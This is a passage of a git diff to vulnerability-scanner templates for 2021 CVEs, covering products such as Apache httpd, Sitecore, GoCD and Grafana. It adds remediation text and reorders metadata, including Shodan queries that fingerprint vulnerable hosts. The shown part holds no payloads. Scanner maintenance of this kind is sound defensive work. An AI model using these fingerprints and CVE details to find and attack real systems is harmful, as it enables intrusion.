https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 - https://twitter.com/itsecurityco/status/1446136957117943815 - http://jvn.jp/en/jp/JVN51106450/index.html - remediation: Upgrade to Apache HTTP Server 2.4.51 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: "CVE-2021-42013" cwe-id: CWE-22 epss-score: 0.97515 - cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* epss-percentile: 0.99973 + cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: apache product: http_server tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 78533e9120..1058575ca9 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser. + remediation: | + Upgrade to a patched version of SAP Knowledge Warehouse (>=7.5.1) to mitigate the XSS vulnerability. reference: - https://seclists.org/fulldisclosure/2022/Mar/32 - https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-42063 cwe-id: CWE-79 epss-score: 0.00377 - cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:* epss-percentile: 0.69374 + cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-266008933 - zoomeye-query: +app:"SAP NetWeaver Application Server httpd vendor: sap product: knowledge_warehouse + shodan-query: http.favicon.hash:-266008933 + zoomeye-query: +app:"SAP NetWeaver Application Server httpd tags: cve2021,sap,xss,seclists,packetstorm,cve http: diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index 73ae9a238e..1ee17577c8 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device. reference: - https://www.exploit-db.com/exploits/50098 - https://nvd.nist.gov/vuln/detail/CVE-2021-42071 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-42071 cwe-id: CWE-78 epss-score: 0.9564 - cpe: cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:* epss-percentile: 0.99153 + cpe: cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: visual-tools diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index f703b36982..219a8d0528 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -5,6 +5,8 @@ info: author: rschio severity: high description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. + remediation: | + Upgrade to a patched version of KONGA or apply the necessary security patches provided by the vendor. reference: - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html - https://www.exploit-db.com/exploits/50521 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-42192 cwe-id: CWE-863 epss-score: 0.0106 - cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* epss-percentile: 0.82302 + cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* metadata: max-request: 3 vendor: konga_project diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index cfb3c3d952..e3fdf71b0f 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -5,26 +5,26 @@ info: author: pdteam severity: critical description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required. + remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. reference: - https://blog.assetnote.io/2021/11/02/sitecore-rce/ - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 - https://nvd.nist.gov/vuln/detail/CVE-2021-42237 - http://sitecore.com - http://packetstormsecurity.com/files/164988/Sitecore-Experience-Platform-XP-Remote-Code-Execution.html - remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42237 cwe-id: CWE-502 epss-score: 0.97532 - cpe: cpe:2.3:a:sitecore:experience_platform:7.5:-:*:*:*:*:*:* epss-percentile: 0.99984 + cpe: cpe:2.3:a:sitecore:experience_platform:7.5:-:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"SiteCore" vendor: sitecore product: experience_platform + shodan-query: http.title:"SiteCore" tags: packetstorm,cve,cve2021,rce,sitecore,deserialization,oast,kev http: diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index 7c99b15d17..a881d09707 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. + remediation: | + Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite. reference: - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-42258 cwe-id: CWE-89 epss-score: 0.97388 - cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:* epss-percentile: 0.99868 + cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: bqe diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index 1f693a97b5..e4adce3814 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -5,6 +5,8 @@ info: author: compr00t severity: medium description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42551 - https://www.redguard.ch/advisories/netbiblio_webopac.txt @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-42551 cwe-id: CWE-79 epss-score: 0.00124 - cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* epss-percentile: 0.46073 + cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: alcoda diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index ead8cefdc8..bafb5e3a38 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42565 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-42565 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* epss-percentile: 0.40864 + cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: myfactory diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index fe6e3520ea..58549fb59a 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42566 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-42566 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* epss-percentile: 0.40864 + cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: myfactory diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 17a28d661d..bac0122b2c 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://apereo.github.io/2021/10/18/restvuln/ - https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-42567 cwe-id: CWE-79 epss-score: 0.25981 - cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* epss-percentile: 0.961 + cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:'CAS - Central Authentication Service' vendor: apereo product: central_authentication_service + shodan-query: http.title:'CAS - Central Authentication Service' tags: cve,cve2021,apereo,xss,cas http: diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 0ffb964cfd..5f49502e4e 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | D-Link DIR-615 devices with firmware 20.06 are susceptible to unauthorized access. An attacker can access the WAN configuration page wan.htm without authentication, which can lead to disclosure of WAN settings, data modification, and/or other unauthorized operations. + remediation: | + Apply the latest firmware update provided by D-Link to fix the vulnerability and ensure strong and unique passwords are set for router administration. reference: - https://github.com/sanjokkarki/D-Link-DIR-615/blob/main/CVE-2021-42627 - https://www.dlink.com/en/security-bulletin/ @@ -17,14 +19,14 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42627 epss-score: 0.05762 - cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:* epss-percentile: 0.92386 + cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Roteador Wireless" verified: true + max-request: 1 vendor: dlink product: dir-615_firmware + shodan-query: http.title:"Roteador Wireless" tags: cve,cve2021,d-link,router,unauth,dir-615,roteador http: diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 9e7b70772a..3126a0e8a6 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker's choice displays. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/0xDeku/CVE-2021-42663 - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-42663 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* epss-percentile: 0.44596 + cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: online_event_booking_and_reservation_system_project product: online_event_booking_and_reservation_system tags: cve,cve2021,xss diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index 148fda23d9..bf9a1eb071 100644 --- a/http/cves/2021/CVE-2021-42667.yaml +++ b/http/cves/2021/CVE-2021-42667.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update to a non-vulnerable version of the Online Event Booking and Reservation System. reference: - https://github.com/0xDeku/CVE-2021-42667 - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-42667 cwe-id: CWE-89 epss-score: 0.02869 - cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* epss-percentile: 0.89414 + cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: online_event_booking_and_reservation_system_project product: online_event_booking_and_reservation_system tags: cve,cve2021,sqli,authenticated diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index d12c18dee8..eb95710aca 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TOTOLINK EX1200T 4.1.2cu.5215 is susceptible to authentication bypass. An attacker can bypass login by sending a specific request through formLoginAuth.htm, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by TOTOLINK to fix the authentication bypass vulnerability. reference: - https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md - https://nvd.nist.gov/vuln/detail/cve-2021-42887 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-42887 cwe-id: CWE-287 epss-score: 0.01827 - cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:* epss-percentile: 0.86733 + cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: title:"TOTOLINK" vendor: totolink product: ex1200t_firmware + shodan-query: title:"TOTOLINK" tags: totolink,auth-bypass,cve,cve2021,router http: diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index e25b36a6a3..725e9dc8ee 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -5,6 +5,8 @@ info: author: ajaysenr severity: medium description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Fortinet FortiMail. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-43062 - https://www.fortiguard.com/psirt/FG-IR-21-185 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-43062 cwe-id: CWE-79 epss-score: 0.00465 - cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* epss-percentile: 0.72371 + cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 96ac4cb8f3..e749adfb06 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -5,26 +5,26 @@ info: author: dhiyaneshDk severity: high description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys. + remediation: Upgrade to version v21.3.0. or later. reference: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - https://www.gocd.org/releases/#21-3-0 - https://github.com/gocd/gocd/commit/41abc210ac4e8cfa184483c9ff1c0cc04fb3511c - remediation: Upgrade to version v21.3.0. or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43287 cwe-id: CWE-200 epss-score: 0.70378 - cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* epss-percentile: 0.97594 + cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" vendor: thoughtworks product: gocd + shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" tags: cve,cve2021,go,lfi,gocd http: diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index b64e238573..d42bd75e26 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code. + remediation: | + Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability. reference: - https://github.com/Studio-42/elFinder/issues/3429 - https://twitter.com/infosec_90/status/1455180286354919425 @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-43421 cwe-id: CWE-434 epss-score: 0.02563 - cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* epss-percentile: 0.88849 + cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: std42 product: elfinder tags: cve,cve2021,elfinder,fileupload,rce,intrusive diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 61c85abf76..00fd005dfd 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -14,8 +14,8 @@ info: cve-id: CVE-2021-43495 cwe-id: CWE-22 epss-score: 0.05064 - cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:* epss-percentile: 0.91909 + cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:* metadata: max-request: 1 vendor: alquistai diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 6dc7fd0f6c..14e29c8236 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -5,6 +5,8 @@ info: author: Evan Rubinstein severity: high description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/varun-suresh/Clustering/issues/12 - https://nvd.nist.gov/vuln/detail/CVE-2021-43496 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-43496 cwe-id: CWE-22 epss-score: 0.05064 - cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* epss-percentile: 0.91909 + cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* metadata: max-request: 1 vendor: clustering_project diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index 2eb88af712..fd773aac97 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Simple Client Management System 1.0. reference: - https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510 - https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-43510 cwe-id: CWE-89 epss-score: 0.01901 - cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.87048 + cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: simple_client_management_system_project product: simple_client_management_system tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 72bce40fec..f34adf5155 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter. + remediation: | + Apply the latest security patches or updates provided by Atmail to fix the XSS vulnerability. reference: - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e - https://help.atmail.com/hc/en-us/sections/115003283988 @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-43574 cwe-id: CWE-79 epss-score: 0.00145 - cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* epss-percentile: 0.49646 + cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.html:"Powered by Atmail" verified: true + max-request: 3 vendor: atmail product: atmail + shodan-query: http.html:"Powered by Atmail" tags: cve,cve2021,atmail,xss http: diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index 6c1126d8c6..e751aa88c5 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter. + remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ - https://github.com/spotweb/spotweb/issues/718 - https://nvd.nist.gov/vuln/detail/CVE-2021-43725 - https://github.com/spotweb/spotweb/commit/2bfa001689aae96009688a193c64478647ba45a1 - remediation: Fixed in version 1.5.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-43725 cwe-id: CWE-79 epss-score: 0.0016 - cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* epss-percentile: 0.51978 + cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: title:"SpotWeb - overview" + max-request: 1 vendor: spotweb_project product: spotweb + shodan-query: title:"SpotWeb - overview" tags: cve,cve2021,xss,spotweb,unauth http: diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 89c09b2a93..20849c0556 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -6,6 +6,8 @@ info: severity: high description: | kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host. + remediation: | + Upgrade to a patched version of kkFileview v4.0.1 or later, or apply the necessary security patches provided by the vendor. reference: - https://github.com/kekingcn/kkFileView/issues/304 - https://nvd.nist.gov/vuln/detail/CVE-2021-43734 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-43734 cwe-id: CWE-22 epss-score: 0.02295 - cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* epss-percentile: 0.88264 + cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.html:"kkFileView" verified: true + max-request: 2 vendor: keking product: kkfileview + shodan-query: http.html:"kkFileView" tags: cve,cve2021,kkfileview,traversal,lfi http: diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index 67fbb8b15a..a01b177a6b 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -5,21 +5,21 @@ info: author: cckuailong severity: high description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. + remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file. reference: - https://github.com/AK-blank/CVE-2021-43778 - https://nvd.nist.gov/vuln/detail/CVE-2021-43778 - https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9 - https://github.com/pluginsGLPI/barcode/releases/tag/2.6.1 - https://github.com/pluginsGLPI/barcode/commit/428c3d9adfb446e8492b1c2b7affb3d34072ff46 - remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43778 cwe-id: CWE-22 epss-score: 0.75886 - cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* epss-percentile: 0.97757 + cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: glpi-project diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 020cfe4c2e..e43ae9bc7a 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -5,27 +5,27 @@ info: author: z0ne,dhiyaneshDk,j4vaovo severity: high description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin. + remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p - https://nosec.org/home/detail/4914.html - https://github.com/jas502n/Grafana-VulnTips - https://nvd.nist.gov/vuln/detail/CVE-2021-43798 - http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html - remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 epss-score: 0.97484 - cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* epss-percentile: 0.9995 + cpe: 